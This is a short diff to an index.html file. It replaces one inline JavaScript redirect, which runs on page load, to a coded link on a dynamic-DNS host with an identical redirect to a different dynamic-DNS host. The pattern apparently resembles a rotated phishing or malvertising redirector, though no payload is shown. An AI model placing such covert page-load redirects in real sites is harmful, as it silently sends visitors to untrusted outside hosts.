--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location = "https://valids.nsupdate.info/r/BRKKJv7";</script>
+<script type="text/javascript">window.location = "https://conto.nerdpol.ovh/r/Pg6dWOY";</script>
